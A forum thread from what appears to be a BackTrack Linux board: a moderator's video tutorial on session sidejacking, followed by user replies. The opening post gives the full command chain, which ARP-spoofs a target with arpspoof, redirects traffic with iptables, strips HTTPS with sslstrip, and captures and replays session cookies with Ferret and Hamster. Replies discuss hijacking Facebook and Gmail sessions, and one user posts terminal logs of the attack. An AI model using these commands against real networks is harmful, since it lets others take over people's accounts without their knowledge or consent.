Page 1 of 2 12 LastLast
Results 1 to 10 of 16

Thread: [Video] Session Sidejacking (Ferret and Hamster)

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default [Video] Session Sidejacking (Ferret and Hamster)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3288793
    Download video: http://www.mediafire.com/?3pz9w85jd4s328q
    What is this?
    This videos demos, how to "Session Sidejacking". Sidejacking is where you clone your targets cookies therefore your "sharing" their identity for that account (without ever knowing the username or password)!


    What do I need?

    > arpspoof
    > sslstrip
    > Hamster (and Ferret)
    *all in BackTrack 4 Final*


    Software
    Name: arpspoof (DSniff)
    Version: 2.3
    Home Page: http://www.monkey.org/~dugsong/dsniff/
    Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

    Name: sslstrip
    Version: 0.6
    Home Page: http://www.thoughtcrime.org/software...rip/index.html
    Download Link: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz

    Name: Hamster Sidejacking Tool
    Version: 2.0
    Home Page: http://hamster.erratasec.com/
    Download Link: http://hamster.erratasec.com/downloa...er-2.0.0.tar.z


    Commands:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 -t 192.168.1.104 192.168.1.1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -p -k -f
    
    /pentest/sniffers/hamster/ferret -i eth0
    
    /pentest/sniffers/hamster/hamster
    
    Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
    Konqueror -> http://hamster
    Notes:
    Song: Soulwax - Bonkers (As Heard On Radio Soulwax Edit)
    Video length: 2:39
    Capture length: 3:42

    Blog Post: http://g0tmi1k.blogspot.com/2010/03/video-session-sidejacking-ferret-and.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1877-%5Bvideo%5D-session-sidejacking-ferret-hamster.html
    Last edited by g0tmi1k; 03-05-2011 at 03:03 PM.
    Have you...g0tmi1k?

  2. #2

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Great video, thank you for posting this. I am very interested in trying this out myself.

    Well done!

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    Big Sky Country
    Posts
    17

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Have you been able to do this against a victim logging into facebook/myspace? Just curious, as when I try it it gives a ton of cookies, and none seem to work. Thanks

  4. #4
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    1

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    What software do you use for creating the videos ?

  5. #5
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    4

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Thanks for sharing, great video, keep going.

  6. #6
    Just burned his ISO Bandito's Avatar
    Join Date
    Jan 2010
    Posts
    5

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    I was able to successfully sidejack my facebook account. However, I am having issues with sidejacking gmail. The victim I used was an XP laptop. I tried to login to gmail on the xp machine, the gmail login URL was directed to an unsecured HTTP. In my attempts it just kept forcing me to re-authenticate and I would never get into my gmail to begin with.

    Any ideas? Is gmail not allowing unencrypted logins now?

  7. #7
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Quote Originally Posted by freemymind View Post
    Great video, thank you for posting this. I am very interested in trying this out myself.

    Well done!
    Quote Originally Posted by Thunder-R View Post
    Thanks for sharing, great video, keep going.
    Thanks for the thanks


    Quote Originally Posted by A Student View Post
    Have you been able to do this against a victim logging into facebook/myspace? Just curious, as when I try it it gives a ton of cookies, and none seem to work. Thanks
    Yep. Works for me. Try again?

    Quote Originally Posted by CyberGod View Post
    What software do you use for creating the videos ?
    Camtasia Studio


    Quote Originally Posted by Bandito View Post
    I was able to successfully sidejack my facebook account. However, I am having issues with sidejacking gmail. The victim I used was an XP laptop. I tried to login to gmail on the xp machine, the gmail login URL was directed to an unsecured HTTP. In my attempts it just kept forcing me to re-authenticate and I would never get into my gmail to begin with.

    Any ideas? Is gmail not allowing unencrypted logins now?
    Try SSLStrip.
    Have you...g0tmi1k?

  8. #8
    Just burned his ISO
    Join Date
    May 2010
    Posts
    5

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    g0tmilk any idea why i get the message "live(1): LLC:control: unparsed value: 0x4e (78)" when i run the cmd "/pentest/sniffers/hamster/ferret -i wlan0"?

  9. #9
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Quote Originally Posted by kenv202 View Post
    g0tmilk any idea why i get the message "live(1): LLC:control: unparsed value: 0x4e (78)" when i run the cmd "/pentest/sniffers/hamster/ferret -i wlan0"?
    Nope.


    Could change your setup, so it could do a test over eth0 and see if it works that way?
    Using a Live CD of backtrack? Installed? Updated backtrack at all?
    Have you...g0tmi1k?

  10. #10
    Just burned his ISO
    Join Date
    May 2010
    Posts
    5

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Quote Originally Posted by g0tmi1k View Post
    Nope.


    Could change your setup, so it could do a test over eth0 and see if it works that way?
    Using a Live CD of backtrack? Installed? Updated backtrack at all?
    hi sorry for the late reply, i am using persistent live cd BT4 final, i have updated everything recently using the apt-get cmd

    i fixed the LLC error by changing to my alfa card rather then using my internal wireless card..

    here is my log:
    1st window:
    echo 1 > /proc/sys/net/ipv4/ip_forward

    root@bt:~# arpspoof -i wlan1 -t 192.168.1.107 192.168.1.117
    0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34
    0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34

    2nd window:
    root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    root@bt:~# sslstrip -p -k -f

    sslstrip 0.6 by Moxie Marlinspike running...

    3rd window: (this is where it starts going wrong i think)
    -- Sniffing on interface "wlan1"
    SNIFFING: wlan1
    LINKTYPE: 1 Ethernet
    ID-IP=[192.168.1.117], macaddr=[00:c0:ca:37:a8:34]
    ID-MAC=[00:c0:ca:37:a8:34], ip=[192.168.1.117]
    Traffic seen
    ID-IP=[192.168.1.107], macaddr=[00:23:6c:89:04:73]
    ID-MAC=[00:23:6c:89:04:73], ip=[192.168.1.107]
    ID-IP=[192.168.1.1], Device="UPnP", LOCATION="http://192.168.1.1:5000/rootDesc.xml"
    ID-IP=[192.168.1.1], Device="UPnP", SOFTWARE="Tomato UPnP/1.0 MiniUPnPd/1.4"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="upnp:rootdevice"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:InternetGatewayDevice:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANConnectionDevice:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANDevice:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANIPConnection:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANPPPConnection:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:Layer3Forwarding:1"
    ID-IP=[192.168.1.1], macaddr=[00:1c:10:11:bc:17]
    ID-MAC=[00:1c:10:11:bc:17], ip=[192.168.1.1]
    proto="DNS", query="A", ip.src=[192.168.1.117], name="rcv-srv22.inplay.tubemogul.com"
    ID-DNS="rcv-srv22.inplay.tubemogul.com", address=[174.129.26.97]
    ID-IP=[192.168.1.117], User-Agent="Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)"
    proto="HTTP", op="GET", Host="rcv-srv22.inplay.tubemogul.com", URL="/StreamReceiver/services"

    4th window :

    root@bt:~# /pentest/sniffers/hamster/hamster
    --- HAMPSTER 2.0 side-jacking tool ---
    begining thread
    Set browser to use proxy BackTrack Linux
    DEBUG: set_ports_option(1234)
    DEBUG: mg_open_listening_port(1234)
    Proxy: listening on 127.0.0.1:1234
    GET /StreamReceiver/services
    GET /StreamReceiver/services HTTP/1.1
    User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)
    Accept: text/html, image/jpeg, image/png, text/*, image/*, */*
    Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
    Accept-Language: en
    Host: rcv-srv22.inplay.tubemogul.com
    Connection: close
    Referer: http://static.inplay.tubemogul.com/c...erID=B-4SJ-WF8

    recv failed: Connection reset by peer
    recv failed: Connection reset by peer

    i have no idea why it says recv failed: Connection reset by peer...

    basically once i got hamster up n running, i proceed to using my 2nd laptop which uses windows 7, i used firefox to log into my gmail account.. then refreshed conquer on my BT4 machine but didnt see the log for that computer in kronquer..
    (yes both of my computer r connected to the same network)

    hope u can help =)

Page 1 of 2 12 LastLast

Similar Threads

  1. [Video] De-ICE.net v1.0 (1.110) {Level 1 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 9
    Last Post: 03-06-2011, 11:38 PM
  2. [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
    By g0tmi1k in forum BackTrack Videos
    Replies: 7
    Last Post: 08-20-2010, 10:00 AM
  3. [Video] De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 02-25-2010, 11:08 AM
  4. framework 3 [...] no session
    By icebox19 in forum Beginners Forum
    Replies: 3
    Last Post: 02-08-2010, 02:41 PM
  5. Video Capture Software
    By sprouty in forum Beginners Forum
    Replies: 4
    Last Post: 01-25-2010, 11:16 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •